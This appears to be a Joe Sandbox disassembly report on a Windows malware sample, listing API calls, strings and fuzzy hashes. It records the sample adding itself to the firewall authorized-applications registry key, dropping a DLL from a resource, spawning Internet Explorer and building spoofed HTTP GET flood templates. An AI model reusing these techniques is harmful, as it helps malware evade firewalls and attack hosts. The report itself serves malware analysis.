L8@, xrefs: 0040520A
P, xrefs: 004052D7
@, xrefs: 0040524F
E, xrefs: 00405233

Memory Dump Source

Source File: 00000007.00000002.2041574826.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2041535304.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041611547.0000000000406000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041707592.0000000000408000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041744590.000000000040A000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041780728.0000000000411000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041817144.0000000000414000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041856155.000000000041A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041889922.000000000041B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041925085.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041960628.0000000000422000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041998511.0000000000428000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042034583.0000000000429000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042070942.000000000042E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042109164.0000000000430000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042142445.0000000000436000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042178619.0000000000437000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042214148.000000000043C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042250391.000000000043E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042287121.000000000043F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042322483.0000000000444000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042357404.0000000000445000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042391202.000000000044A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042425715.000000000044C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042459631.0000000000452000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042494427.0000000000453000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042529261.0000000000458000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042564892.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042599424.000000000045B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042632509.0000000000460000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042665134.0000000000461000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042698465.0000000000466000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042729811.0000000000468000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042768818.0000000000469000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042801538.000000000046E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042833900.000000000046F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042866159.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042900352.0000000000476000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042933732.0000000000477000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042970923.000000000047C000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_hrl97AF.jbxd

Similarity

API ID: CountExitSleepThreadTickrand
String ID: %d.%d.%d.%d$192.168.1.244$<6@$@$E$L8@$P$p8@$8@$[@
API String ID: 896407411-3061671333
Opcode ID: a9ee2490293e25e91a77c21d2959831a20bb89c8af2e816b72d14c690114d407
Instruction ID: 2acc1ecf18658df22ca3a7ea1314f5fe6e182d61b19c12b6ce0228fb74aabab8
Opcode Fuzzy Hash: a9ee2490293e25e91a77c21d2959831a20bb89c8af2e816b72d14c690114d407
Instruction Fuzzy Hash: 14B19D715083459AE710DF60C845B6FB7E5FFC4708F00492DFA89A7291DBB4AA09CB9B

Function 0047FE2F Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 240sleeplibraryfileCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,0047FE25), ref: 0047FE30
LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 0047FE43
GetTickCount.KERNEL32 ref: 0047FE77
GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00483082,00000000,00000000,00000000,00000000), ref: 0047FF49
Sleep.KERNEL32(00000064,0000001E), ref: 0047FF90
DeleteFileA.KERNEL32(00482D28), ref: 0047FF97
CreateThread.KERNEL32(00000000,00000000,0047F985,00000000,00000000), ref: 0048004B
CloseHandle.KERNEL32(?,0C1A4F68), ref: 00480054
Sleep.KERNEL32(00001388,00000000,00000000), ref: 004800FB

Strings

"', xrefs: 0047FFC2
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 00480017
ADVAPI32.DLL, xrefs: 0047FE42

Memory Dump Source

Source File: 00000007.00000002.2042970923.000000000047C000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2041535304.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041574826.0000000000401000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041611547.0000000000406000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041707592.0000000000408000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041744590.000000000040A000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041780728.0000000000411000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041817144.0000000000414000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041856155.000000000041A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041889922.000000000041B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041925085.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041960628.0000000000422000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041998511.0000000000428000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042034583.0000000000429000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042070942.000000000042E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042109164.0000000000430000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042142445.0000000000436000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042178619.0000000000437000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042214148.000000000043C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042250391.000000000043E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042287121.000000000043F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042322483.0000000000444000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042357404.0000000000445000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042391202.000000000044A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042425715.000000000044C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042459631.0000000000452000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042494427.0000000000453000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042529261.0000000000458000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042564892.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042599424.000000000045B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042632509.0000000000460000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042665134.0000000000461000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042698465.0000000000466000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042729811.0000000000468000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042768818.0000000000469000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042801538.000000000046E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042833900.000000000046F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042866159.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042900352.0000000000476000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042933732.0000000000477000.00000080.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_hrl97AF.jbxd

Similarity

API ID: Sleep$AddressCloseCountCreateDeleteFileHandleInformationLibraryLoadProcThreadTickVolume
String ID: "'$ADVAPI32.DLL$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
API String ID: 3376152981-2346592412
Opcode ID: 5b9ba073255788373456750f45873bb949f55a25902f1e72925c0e661daa5f85
Instruction ID: 09c322043ac8d84edb9ce6a58673b1a16576989b4127bcfadf353c9930ff3144
Opcode Fuzzy Hash: 5b9ba073255788373456750f45873bb949f55a25902f1e72925c0e661daa5f85
Instruction Fuzzy Hash: 0671D471514718BFEB66AF659C0ABEE376CDF01301F00452BFD199A082DAF85F0986A9

Function 00404715 Relevance: 21.2, APIs: 4, Strings: 8, Instructions: 203sleepprocessthreadCOMMON

Download Yara Rule

APIs

Part of subcall function 00403C10: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00403C20
Part of subcall function 00403C10: lstrcatA.KERNEL32(?,\Program Files\Internet Explorer\iexplore.exe,?,00000104), ref: 00403C35
Part of subcall function 00403C10: lstrcpyA.KERNEL32(?,?,?,\Program Files\Internet Explorer\iexplore.exe,?,00000104), ref: 00403C48

CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0040482E
Sleep.KERNEL32(00001388), ref: 0040483D
Sleep.KERNEL32(0000000A,?,00000000), ref: 0040498D
ExitThread.KERNEL32 ref: 00404997

Strings

<6@, xrefs: 0040477F
%s %s%s, xrefs: 004047A1
GET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#, xrefs: 004047E0
GET %s HTTP/1.1Host: %s, xrefs: 0040487D
GET %s HTTP/1.1Host: %s:%d, xrefs: 004048A2
D, xrefs: 004047B4
GET %s HTTP/1.1Content-Type: text/htmlHost: %s:%dAccept: text/html, */*User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01), xrefs: 0040492A
GET %s HTTP/1.1Content-Type: text/htmlHost: %sAccept: text/html, */*User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01), xrefs: 004048E7

Memory Dump Source

Source File: 00000007.00000002.2041574826.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2041535304.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041611547.0000000000406000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041707592.0000000000408000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041744590.000000000040A000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041780728.0000000000411000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041817144.0000000000414000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041856155.000000000041A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041889922.000000000041B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041925085.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041960628.0000000000422000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041998511.0000000000428000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042034583.0000000000429000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042070942.000000000042E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042109164.0000000000430000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042142445.0000000000436000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042178619.0000000000437000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042214148.000000000043C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042250391.000000000043E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042287121.000000000043F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042322483.0000000000444000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042357404.0000000000445000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042391202.000000000044A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042425715.000000000044C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042459631.0000000000452000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042494427.0000000000453000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042529261.0000000000458000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042564892.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042599424.000000000045B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042632509.0000000000460000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042665134.0000000000461000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042698465.0000000000466000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042729811.0000000000468000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042768818.0000000000469000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042801538.000000000046E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042833900.000000000046F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042866159.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042900352.0000000000476000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042933732.0000000000477000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042970923.000000000047C000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_hrl97AF.jbxd

Similarity

API ID: Sleep$CreateDirectoryExitProcessSystemThreadlstrcatlstrcpy
String ID: %s %s%s$<6@$D$GET %s HTTP/1.1Content-Type: text/htmlHost: %sAccept: text/html, */*User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01)$GET %s HTTP/1.1Content-Type: text/htmlHost: %s:%dAccept: text/html, */*User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01)$GET %s HTTP/1.1Host: %s$GET %s HTTP/1.1Host: %s:%d$GET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#
API String ID: 2825703556-4267235928
Opcode ID: e08e1effa276eb7547b25f3cb29d33cb09f5be14afca26cf21ab89a8ec85cfde
Instruction ID: 3e73d33b29753aa0a0a8c23456e8152a650bf458f26c86c47ab00128547e0a80
Opcode Fuzzy Hash: e08e1effa276eb7547b25f3cb29d33cb09f5be14afca26cf21ab89a8ec85cfde
Instruction Fuzzy Hash: 6D51DAB25443446BD324DB64CD41FFB77A8ABC5704F004D3EF64AA32C1EA75AA048B9B

Function 00402430 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 71libraryfileloaderCOMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(?,?,?), ref: 0040244F
LoadLibraryA.KERNEL32(kernel32.dll,SizeofResource), ref: 00402461
GetProcAddress.KERNEL32(00000000), ref: 00402468
LoadResource.KERNEL32(?,00000000), ref: 0040247A
LockResource.KERNEL32(00000000), ref: 00402489
CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 004024BD
WriteFile.KERNEL32 ref: 004024DC
CloseHandle.KERNEL32(00000000), ref: 004024E3

Strings

<6@, xrefs: 004024A0
SizeofResource, xrefs: 00402455
kernel32.dll, xrefs: 0040245A
hra%u.dll, xrefs: 0040249A

Memory Dump Source

Source File: 00000007.00000002.2041574826.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2041535304.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041611547.0000000000406000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041707592.0000000000408000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041744590.000000000040A000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041780728.0000000000411000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041817144.0000000000414000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041856155.000000000041A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041889922.000000000041B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041925085.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041960628.0000000000422000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041998511.0000000000428000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042034583.0000000000429000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042070942.000000000042E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042109164.0000000000430000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042142445.0000000000436000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042178619.0000000000437000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042214148.000000000043C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042250391.000000000043E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042287121.000000000043F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042322483.0000000000444000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042357404.0000000000445000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042391202.000000000044A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042425715.000000000044C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042459631.0000000000452000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042494427.0000000000453000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042529261.0000000000458000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042564892.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042599424.000000000045B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042632509.0000000000460000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042665134.0000000000461000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042698465.0000000000466000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042729811.0000000000468000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042768818.0000000000469000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042801538.000000000046E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042833900.000000000046F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042866159.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042900352.0000000000476000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042933732.0000000000477000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042970923.000000000047C000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_hrl97AF.jbxd

Similarity

API ID: Resource$FileLoad$AddressCloseCreateFindHandleLibraryLockProcWrite
String ID: <6@$SizeofResource$hra%u.dll$kernel32.dll
API String ID: 2921964263-2374908272
Opcode ID: 8a57ef22dd47a814e705dbe9eb76e98e586b3eddb95431373c2ff637a7035f3e
Instruction ID: 298c1543b4fc4cf1b22406217ce591795a308af8d218835589389581325cd5cf
Opcode Fuzzy Hash: 8a57ef22dd47a814e705dbe9eb76e98e586b3eddb95431373c2ff637a7035f3e
Instruction Fuzzy Hash: 9211E9321803007BE2309B659E4DFAB7BACDF85B10F054439FA42F21D0DBB9981586B9

Function 00404530 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 142sleepthreadprocessCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00404627
Sleep.KERNEL32(000007D0), ref: 00404632
Sleep.KERNEL32(0000000A), ref: 00404643
ExitThread.KERNEL32 ref: 00404649
Sleep.KERNEL32(00000032,?,00000000), ref: 00404704
ExitThread.KERNEL32 ref: 0040470F

Part of subcall function 00403C10: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00403C20
Part of subcall function 00403C10: lstrcatA.KERNEL32(?,\Program Files\Internet Explorer\iexplore.exe,?,00000104), ref: 00403C35
Part of subcall function 00403C10: lstrcpyA.KERNEL32(?,?,?,\Program Files\Internet Explorer\iexplore.exe,?,00000104), ref: 00403C48

Strings

D, xrefs: 004045DB
<6@, xrefs: 004045C4, 0040469F
%s %s%s, xrefs: 004045BE
GET %s HTTP/1.1Content-Type: text/htmlHost: %sAccept: text/html, */*User-Agent:Mozilla/5.0 (X11; U; Linux i686; en-US; re:1.4.0) Gecko/20080808 Firefox/%d.0, xrefs: 00404692
GET %s HTTP/1.1Referer: http://%s:80/http://%sHost: %sConnection: CloseCache-Control: no-cache, xrefs: 00404673

Memory Dump Source

Source File: 00000007.00000002.2041574826.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2041535304.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041611547.0000000000406000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041707592.0000000000408000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041744590.000000000040A000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041780728.0000000000411000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041817144.0000000000414000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041856155.000000000041A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041889922.000000000041B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041925085.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041960628.0000000000422000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041998511.0000000000428000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042034583.0000000000429000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042070942.000000000042E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042109164.0000000000430000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042142445.0000000000436000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042178619.0000000000437000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042214148.000000000043C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042250391.000000000043E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042287121.000000000043F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042322483.0000000000444000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042357404.0000000000445000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042391202.000000000044A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042425715.000000000044C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042459631.0000000000452000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042494427.0000000000453000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042529261.0000000000458000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042564892.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042599424.000000000045B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042632509.0000000000460000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042665134.0000000000461000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042698465.0000000000466000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042729811.0000000000468000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042768818.0000000000469000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042801538.000000000046E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042833900.000000000046F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042866159.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042900352.0000000000476000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042933732.0000000000477000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042970923.000000000047C000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_hrl97AF.jbxd

Similarity

API ID: Sleep$ExitThread$CreateDirectoryProcessSystemlstrcatlstrcpy
String ID: %s %s%s$<6@$D$GET %s HTTP/1.1Content-Type: text/htmlHost: %sAccept: text/html, */*User-Agent:Mozilla/5.0 (X11; U; Linux i686; en-US; re:1.4.0) Gecko/20080808 Firefox/%d.0$GET %s HTTP/1.1Referer: http://%s:80/http://%sHost: %sConnection: CloseCache-Control: no-cache
API String ID: 4106849892-1695404734
Opcode ID: 77bc9a4e8d2d1452da797db159c73d812a404676eedf890ee0f1537427deca61
Instruction ID: aea2a5038014d6908c877e8ed60871dbc4ffd7e4e280d37711b0d24c40857b9e
Opcode Fuzzy Hash: 77bc9a4e8d2d1452da797db159c73d812a404676eedf890ee0f1537427deca61
